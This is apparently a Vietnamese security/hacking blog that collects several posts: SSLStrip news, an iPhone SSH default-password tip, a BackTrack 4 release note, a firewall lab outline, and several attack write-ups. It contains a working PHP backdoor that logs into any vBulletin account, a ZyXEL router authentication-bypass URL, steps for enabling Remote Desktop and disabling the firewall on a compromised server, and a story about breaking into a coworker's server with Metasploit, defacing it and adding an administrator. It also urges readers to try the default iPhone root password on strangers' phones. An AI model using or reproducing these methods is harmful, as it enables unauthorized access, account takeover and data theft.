Lỗi mã hóa SSL đe dọa dữ liệu cần bảo mật

Cơ sở dữ liệu mang thông tin nhạy cảm như chi tiết thẻ tín dụng, thông tin tài khoản ngân hàng kèm mật khẩu đều có thể bị tấn công qua lỗi trong phần mềm sử dụng mã hóa bảo mật SSL.

Vấn đề nằm trong cách thức mà nhiều trình duyệt sử dụng để triển khai SSL (Secure Sockets Layer) và lỗi cũng nằm trong hệ thống khóa công cộng X.509 thường được dùng để quản lý chứng thực số được sử dụng bởi SSL nhằm quyết định xem website đó có đáng tin cậy hay không.

Moxie Marlinspike, chuyên gia nghiên cứu bảo mật, đã trình diễn cách thức chặn luồng lưu lượng SSL bằng chứng thực kết thúc rỗng (null-termination certificate – theo cách gọi của Marlinspike). Để thực hiện công việc tấn công, Marlinspike buộc phải cài đặt phần mềm “SSL Strip” của mình lên mạng nội bộ trước. Sau khi cài đặt, nó chặn các lưu lượng kết nối SSL và bắt đầu thực hiện “chứng thực kết thúc rỗng” để ngắt liên lạc giữa máy chủ và máy trạm.

Giải mã “SSL Strip” – Kiểu tấn công người-đứng-giữa

codeSSL

(Ảnh minh họa: DefCon 07)

Việc khai thác giao diện giữa các session http và https sử dụng những kỹ thuật đã có từ vài năm nay. SSL Strip thực hiện tấn công một lưu lượng http (không bảo mật) thông thường, thay thế những liên kết đến các trang https bảo mật bằng http. Người dùng sẽ đăng nhập tài khoản và thông tin thẻ tín dụng trên một trang không bảo mật và tin tặc sử dụng SSL Strip có thể thu thập thông tin chi tiết này dễ dàng.

Điểm nguy hại của kiểu tấn công người-đứng-giữa (man-in-the-middle attack) này là người dùng vẫn tin tưởng rằng mình đang sử dụng liên kết được bảo mật (https).

Khi một người dùng cẩn thận truy cập vào 1 trang web với kết nối mã hóa bảo mật (biểu tượng ổ khóa trên thanh địa chỉ và kết nối https thay vì http) ví dụ như đăng nhập vào tài khoản Gmail, bạn sẽ được chuyển đến địa chỉ đăng nhập bảo mật https của google.com và kể từ lúc đó, hầu hết người dùng đều không để ý đến kết nối https nữa vì đinh ninh rằng mình vẫn tiếp tục kết nối bảo mật với dữ liệu được mã hóa.

Thông tin xung quanh lỗi trong phần mềm mã hóa SSL và SSL Strip của Moxie Marlinspike có thể tham khảo thêm tại hội thảo Black Hat USA 2009 (ngày 25 đến 29-7-2009) và hội thảo DEFCON 17 (đang diễn ra).

SSL Strip đánh vào tâm lý chủ quan đó của đại đa số người dùng bằng cách thực hiện vài thao tác giả mạo. Một ví dụ nhỏ về bẫy đơn giản là thay thế biểu tượng Favicon bằng một biểu tượng ổ khóa tương tự với biểu tượng ổ khóa của kết nối https. Mặc dù nó nằm sai vị trí và kết nối vẫn thuộc dạng thông thường http nhưng đa số người dùng sẽ không để ý và mắc bẫy.

codeSSL1

Kết nối bảo mật https (SSL) sẽ giúp đảm bảo an toàn thông tin cho người dùng khi giao dịch trực tuyến

Marlinspike cho biết đã “lấy tạm” 117 tài khoản email, 16 thẻ tín dụng, 7 tài khoản Paypal… để làm minh chứng cho khả năng của “SSL Strip”.

Tạo chứng thực giả

Marlinspike còn triển khai cách thức tin tặc có thể sử dụng lỗi trong IDN (International Domain Name) để lấy một chứng thực SSL để bẫy ngược lại bộ chỉ điểm của SSL thông thường và hiển thị tên miền với https.

Kiểu tấn công này không phải là một cuộc tấn công vào SSL thực sự mà chỉ “đánh vòng” vào sườn xung quanh SSL. Không có mã hóa nào bị phá vỡ.

Marlinspike tạo ra chứng thực giả cho tên miền (domain) của mình có kèm theo ký tự rỗng (null) thường được hiển thị là . Một số chương trình sẽ bị mắc lừa bởi chứng thực giả, ngưng đọc nội dung khi chúng bắt gặp 1 ký tự rỗng. Do đó, một chứng thực giả cho www.paypal.com.tenmien.com lại được chương trình hiểu là thuộc về paypal.com.

codeSSL2

Moxie Marlinspike tại hội thảo bảo mật Black Hat 2009

Mức độ nguy hiểm cao

MD2 là thuật toán được sử dụng bởi hãng bảo mật VeriSign từ 13 năm trước, có mặt trên mọi trình duyệt web. VeriSign đã ngưng sử dụng MD2 vào ngày 17-5-2009 vì không còn bảo đảm an toàn trước những cuộc tấn công từ tin tặc.

Xem video phỏng vấn Moxie Marlinspike tại đây.

“Cách tấn công này chưa thể dò tìm ra và cho phép tin tặc đánh cắp mật khẩu, hijack vào các phiên giao dịch ngân hàng trực tuyến hay thậm chí là đưa ra một bản cập nhật trình duyệt FireFox có đính kèm mã độc”, Marlinspike cho biết. “Việc tạo chứng thực giả cũng ảnh hưởng rộng rãi lên nhiều chương trình như Internet Explorer hay FireFox 3, phần mềm VPN (mạng riêng ảo), các chương trình email-client hay tin nhắn tức thời (IM)..”.

Các chuyên gia đều cho biết tin tặc cao tay có thể dễ dàng vượt chứng thực bảo mật SSL vì công nghệ mã hóa MD2 vẫn còn được dùng trong nhiều chương trình web đã quá lỗi thời và không còn bảo mật. Hiện chỉ có trình duyệt FireFox 3.5 đã khắc phục lỗi “kết thúc rỗng”.

Hầu hết đồng ý cho rằng hệ thống X.509 thường được dùng để quản lý chứng thực cho SSL đã quá cũ kỹ, cần được sửa chữa và nâng cấp.

Theo Thanh Trực

———-

LAB Demo : Using SSLStrip to proxy an SSL connection and sniff it

[youtube=http://www.youtube.com/watch?v=XKizVsRVdAk&hl=en]

TIP: Change your iPhone’s SSH password

Là dân IT, chắc hẳn bạn đã Jailbreak (*) con IPhone của bạn để vọc hết tính năng của nó, bạn có thể dùng nhiều bộ cài đặt nhưng thông thường nhất là sử dụng bộ cài đặt Cydia/Installer.

cydia

Để tiến sâu vào trong lòng IPhone hơn thì bạn phải cài gói OpenSSH để vào Iphone qua con đường đó, tuy nhiên nhược điểm ở đây là tất cả đều chung username : root và password : alpine. Và SSH luôn luôn mở khi bạn restart Iphone.

Như vậy là khi bạn kết nối internet với các thông tin mà attacker đã biết hết thì việc vào phone của bạn là một điều hết sức dễ dàng. Để tránh bị “héc kờ” dòm ngó vào các thông tin cá nhân của mình thì cách đơn giản nhất là tắt SSH hoặc đổi password user root. Cách làm của tôi là đổi password User root.

– Tôi đã cho Iphone kết nối internet qua wifi và IPhone nhận được IP là 192.168.1.67

– Trên computer, tôi ping tới địa chỉ  192.168.1.67 thành công.

picture180

– Tôi dùng phần mềm putty để kết nối với Iphone qua đường SSH.

picture181

– Chọn YES để nhận RSA KEY

picture189

– Nhập username/password mặc định của Cydia là : root/alpine

picture190

– Gõ lệnh “passwd” và nhập vào password mới. Như vậy là OK rồi, hihi smile_regular

picture192 

P/s : Ra quán cafe mà thấy ai dùng Iphone thì hãy kết nối SSH vào với username và pass là root/alpine thì cơ hội thành công cao lắm đó nha, chính tôi đã thử rồi. hehe smile_embaressed

(*) JAILBREAK là gì? : JAIL Break là bước đầu tiên trong quá trình hacking iphone.Khi mà iphone ở trong tình trạng nguyên bản từ nhà máy ra thì các file hệ thống của nó được bảo vệ rât tốt. Để đơn giản hơn, hãy tưởng tượng iphone là một cái xe ô tô . Apple muốn bạn ngồi sau xe, và đây là nơi mà bạn thưởng thức nhạc, video, wallpaper hay là photos. Apple hài lòng khi để bạn ngồi ghế sau của xe, đưa bạn chạy lòng vòng trên con đường mang tên AT&T. Nhưng bây giờ bạn muốn lái xe thì sao?
Những con iphone của chúng ta được ví giống như xe thùng của cảnh sát. Ngăn cách giữa ghế sau và ghế trước là một cánh cửa thép to lớn và nặng trịch. Làm thế nào để vượt qua được cánh cửa này? Lúc này là lúc chúng ta cần đến JAILBREAK. JAILBREAK là một quá trình đưa bạn ra khỏi hàng ghế sau, lên ghế trước nơi mà bạn có thể cầm vô lăng, đạp pedal, điều khiển radio, còi xe..vv. Khi iphone đã JAILBREAK, bạn có toàn quyền điều khiển con dế của mình, bạn có thể chạy bất cứ chương trình gì trên iphone giống như bạn có toàn điều khiển chiếc xe của chính mình.

Fake login vBulletin

Ta có thể login vào forum vbb với 1 nick bất kỳ bằng cách sau :

– Save đoạn code dưới dưới dạng file xxx.php, upload lên hosting.

– Chạy đường dẫn http://domain.com/forum/xxx.php?bd=username

Bùm … truy cập lại link http://domain.com/forum/index.php đã đăng nhập với nick username smile_regular

CODE :

<?php
if (isset($_GET[‘bd’]))
{
define(‘THIS_SCRIPT’, ‘login’);
require_once(‘./global.php’);
require_once(‘./includes/functions_login.php’);
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = ‘" . $_GET[‘bd’] . "’");
if (!$vbulletin->userinfo[‘userid’]) die("Invalid username!");
else
{
vbsetcookie(‘userid’, $vbulletin->userinfo[‘userid’], true, true, true);
vbsetcookie(‘password’, md5($vbulletin->userinfo[‘password’] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET[‘bd’]);
process_new_login(‘cplogin’, TRUE, TRUE);
do_login_redirect();
}
}

?>

DEMO :

picture078

picture077

BackTrack4 Beta release

Download : http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso

bt4_1

bt4_2

bt4_3

Một số thông tin:

* Default password to BackTrack 4 hasn’t changed, still root / toor.
* KDE 3 is being used in BT4. We tried KDE 4, really, we did. It ****ed. Maybe 4.2 in BT4 final.
* Most of the KDE "apt gettable" packages have "kde3" appended to their names. So "apt-get install kate-kde3" is good, "apt-get install kate" is bad. Use "apt-cache search " to search for packages to install.
* Kernel sources included in /usr/src/linux.
* DHCP disabled by default on boot, you need to /etc/init.d/networking start
* If you do an HD install and want to restore networking (DHCP) to be enabled at boot, type "update-rc.d networking defaults".
* VMware users – to fix the KDE resolution, type "fixvmware" before starting X.
* Vmware tools and kernel modules compile perfectly on VMWare 6.5.1
* If you can’t get X to work, first try to autogenerate an xorg.conf by typing "Xorg -configure" and try using the generated conf file. If that bums out, you can revert to VESA by typing "fixvesa".
* Wireless networking in KDE can be started with KnetworkManager (/etc/init.d/NetworkManager)
* Various drivers can be found in /opt/drivers (various madwifi branches, video drivers for Nvidia and HP 2133’s).
* Installation of BT4 to HD is similar to BT3. (tip – dont forget to modify /etc/fstab after the install. Change the first line from aufs / aufs …. to the corresponding device and filesystem. For example, on my box it’s /dev/sda3 / reiserfs defaults 0 0, as my root partition is on sda3 and i used the resiserfs filesystem).
* The warning message "W: GPG error: http://ppa.launchpad.net intrepid Release: The following signatures couldn’t be verified because the public key is not available: NO_PUBKEY CB2F6C86F77B1CA9" when "apt-get update" occurs as the Intrepid KDE 3 repos do not use a GPG key. We will eventually host these package in our own repo.
* Conky takes a while to load.

BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA

Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.

Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3

B1. Trên Server kiểm tra remote desktop chưa bật.

picture001

B2. Trên máy Attacker, telnet vào Server

picture002

B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop

picture003

Nội dung file VBScript remote.vbs

machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ‘ 0=off, 1=on

set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next

B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.

picture004

B5. Dùng lệnh dir kiểm tra

picture005

B6. Chạy file remote.vbs để bật remote desktop.

picture006

B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)

picture007

B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật

picture008

B9. Tắt firewall của Server

Sử dụng lệnh : Netsh firewall set opmode disable

picture009

B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.

Sử dụng lệnh rdesktop [hostname]

picture010

B11. Nhập username/password của Administrator

picture011

B12. Truy cập thành công với quyền Administrators

picture012

Have a nice day smile_wink

Một số công cụ xem Password

Vận dụng tính năng lưu lại các password của các phần mềm, các công cụ sau sẽ giúp ta lấy lại các mật khẩu này:

password_star

IE Passview
– Hỗ trợ IE7
– Recovery password lưu trữ trên IE gồm: AutoComplete, HTTP Authentication, FTP
Download

Mail PassView
Xem và Export Password account Outlook Express, MS Outlook, Windows Mail,…
Download

PstPassword
Password Outlook .PST file
Download

WirelessKeyView
Download

Dialupass
Xem password Dialup/RAS/VPN
Download

Revelation
Công cụ hiển thị các password trực tiếp trên các textbox (dấu *)
Download

TRIỂN KHAI ISA FIREWALL CHO HỆ THỐNG DOANH NGHIỆP PHẦN 2: ACCESS RULES

del.icio.us Tags:

Tiếp theo phần 1, sau khi các bạn đã cài đặt thành công ISA Server 2006, các bạn cần phải tạo ra các Access Rule để quản lý mọi gói tin ra vào hệ thống. Trong phần 2 sẽ hướng dẫn cách tạo các Access Rule phù hợp với nhu cầu của các doanh nghiệp hiện nay.

Bài lab bao gồm các bước:

1. Kiểm tra Default Rule

2. Tạo rule truy vấn DNS để phân giải tên miền

3. Tạo rule cho phép các user thuộc nhóm Manager truy cập Internet không hạn chế

4. Tạo rule cho phép các user thuộc nhóm Staff chỉ được phép truy cập 1 số trang web trong giờ hành chánh

5. Tạo rule cho phép các user thuộc nhóm Staff được truy cập web trong giờ giải lao, ngoại trừ trang ngoisao.net

6. Tạo rule cho phép user có thể kết nối mail yahoo bằng Outlook Express

7. Không cho nghe nhạc trực tuyến, cấm chat Yahoo Messenger, cấm download file có đuôi .exe

8. Cấm truy cập một số trang web, nếu truy cập sẽ tự động chuyển đến trang web cảnh báo của công ty

Nội dung bài lab

Bugs lỗi trên ADSL Zyxel

Hầu hết các khách hàng sử dụng Internet của FPT Telecom thường được tặng Router ADSL Zyxel. Nhưng trên Router ADSL Zyxel vẫn còn một bugs lỗi khá lâu vẫn còn tác dụng khai thác. Bugs có thể Bypass authentication reset modem và upload firmware khác.

Truy cập vào Router với đường dẫn: http://x.x.x.x/rpFWUpload.html (phân biệt hoa thường)

Bypass ZyXEL

Loại Router có thể khai thác:

– ZyXEL Prestige 600
– ZyXEL Prestige 645R-A1
– ZyXEL Prestige 650H
– ZyXEL Prestige 650HW
– ZyXEL Prestige 650HW-31
– ZyXEL Prestige 650R
– ZyXEL ZyNOS IS.3, IS.5, V3.40(ES.5), 3.40

———

* Trong ví dụ này tôi sử dụng ADSL Router ZyXEL Prestige 600

Ếch Con giở chiêu đột nhập vào WebServer của Tư Nòng Nọc

Lưu ý : Bài viết này là demo chứng minh cho tầm quan trọng của việc quản trị mạng chứ không phải hướng dẫn các bạn đi "chôm" pasword ! Đối với vai trò 1 Administrator thì không phải build up một network cho chạy là xong, mà phải kiểm soát và phải có phương hướng bảo mật cho network của mình. (Các tên nhân vật và tình huống câu chuyện là do tôi hư cấu)

****

Như các bạn đã theo dõi bộ truyện nhiều tập "CHÔM PASSWORD VÀ ĐỌC LÉN MAIL CỦA SẾP", đã biết qua các nhân vật như :

– Ếch Con là lính của Sếp Hai Nhái : thích tìm tòi học hỏi những cái mới và thích châm chọc những người tự cao tự đại.

– Tư Nòng Nọc là lính của Sếp Ba Cóc : thích khoe khoang mặc dù không biết gì, giang hồ có câu "Điếc hay ngóng, ngọng hay nói" thì Tư Nòng Nọc đã có 7 phần trong đó smile_embaressed

****

Cũng vào một dịp nhậu nhẹt tại quán Thu Nở có đầy đủ các nhân vật Hai Nhái, Ếch Con, Ba Cóc, Tư Nòng Nọc. Đang vào tháng 9 nên Phan Thiết có đặc sản là cá Tắc Kè và cá Bò hòm (*). Vô được 5-6 chai ken thì Hai Nhái nhớ "bài lai" vụ laptop của mình shutdown lâu lắc và hay đòi restart liền hỏi Ếch. Ếch ta trả lời là do Windows update các bản vá lỗi cho an toàn nên phải restart lại mới … "ép phê". Nghe đến đây thì Tư Nòng Nòng nọc "xìiiii" 1 tiếng rõ to và nói rằng "chú chỉ khéo vẽ trò, mình cài Windows xong rồi đặt password thật khó là không ai phá được. Như bản thân anh cài máy "con server" ở cơ quan cũng có update gì đâu mà vẫn chạy tốt. Hôm nào chú sang anh giở vài chiêu xem có làm ăn gì được không vì anh đặt password … dài lắm, haha". Ếch Con nghĩ thầm "hãy đợi đấy, rồi có lúc ông anh sẽ thấy việc quan trọng của update. Nu! pododi (**)".

Bẵng đi một thời gian, Ếch Con lại có dịp sang cơ quan của Ba Cóc. Cũng như lần trước, nó cũng xin một sợi cable mạng để vào Internet. Nó nhớ lại vụ hôm trước và truy cập vào WebServer của cơ quan Ba Cóc (nó biết được IP nội bộ không khó vì khi nó dùng lệnh "net view" thì thấy có computer tên là WebServ). Hmmm, gớm nhỉ, "Security by Tư Nòng Nọc" luôn cơ à, nếu như theo lời Tư Nòng Nọc không update Windows thì hãy xem thằng Ếch này đây.

picture001

– Thằng Ếch liền download Meta Framework 3.1 để chuẩn bị "ảo thuật" đột nhập vào WebServer.

– Sau khi download xong thì nó liền Install vào.

picture002

– Trong quá trình cài đ8ạt Metasploit Framework 3.1 thì có yêu cầu cài thêm Nmap, thằng Ếch cài luôn.

picture003

– Finish rồi, chạy chương trình thôi

picture004

– Metasploit Framework đang khởi động.

picture005

– Ui chu choa, giao diện ngầu quá đi smile_omg

picture006

– Sau khi chương trình start xong, nó liền search 1 cái lỗi mà nó biết qua trang milw0rm.com là lỗi "rpc dcom".

picture008

– Đây rồi, click vô 1 cái.

picture009

– Đây rồi Windows NT/2000/XP/2003 đều có thể "chơi" được, click forward 1 cái.

picture010

– Thằng Ếch nó chọn shell_bind_tcp, forward cái nữa.

picture011

– Điền IP của Webserver vào, mọi thứ để default rồi forward tiếp.

picture012

– Chương trình detect, đợi thành công thì nhấn apply 1 cái.

picture013

– Oh yeah ! thằng ếch nó cười nham hiểm vì thấy phiên làm việc (session) đã được khởi tạo.

picture014

– Thằng Ếch liền chọn Interact Session.

picture015

– Haha, lấy được CMD rồi, giở chiêu quậy phá thôi.

picture016

– Ếch dùng lệnh "dir" để xem đĩa C:\ của Server và tạo 1 folder "Server_bi_hack" để cảnh báo.

picture017

– Chưa đủ trò quậy phá nó liền sữa trang chủ của website thành nội dung "Tư Nòng Nọc bị đứt đuôi rồi"

picture018

– Truy cập lại xem cái coi, oh ! đẹp quá đi smile_wink Mất tiêu cái "Security by Tư Nòng Nọc" rồi.

picture019

– Ngoài ra nó còn tạo thêm 1 user tên ech và cho vào group Administratos luôn. Chà, nó có thâm ý gì đây nhỉ smile_omg

picture020

– Oh ! nó chạy chương trình Remote Desktop Connection, thì ra là nó muốn quản lý Server bằng giao diện luôn. hihi

picture021

– Nó nhập IP WebServer vào rồi chọn Connect

picture022

– Nó nhập user ech và password vừa tạo vào.

picture023

– Tèn ten ten ten, đăng nhập được vào Server với quyền Administrator luôn rồi. Chiến này Tư Nòng Nọc khổ dài dài rồi.

picture024

Hihi, vậy là Tư Nòng Nọc hết dám khoe khoang lộn chỗ rồi phải không các bạn. Và các bạn cũng đã thấy cái hại của việc không cập nhật bản vá lỗi thường xuyên rồi đấy nhé, sau này các bạn nhớ update windows thường xuyên nha.

—————-

(*) Muốn biết cá Tắc Kè và cá Bò Hòm thì các bạn xem tại đây

(**) Nu! pogodi : là câu nói của nhân vật Sói trong phim hoạt hình nổi tiếng "Hãy Đợi Đấy" đó bạn.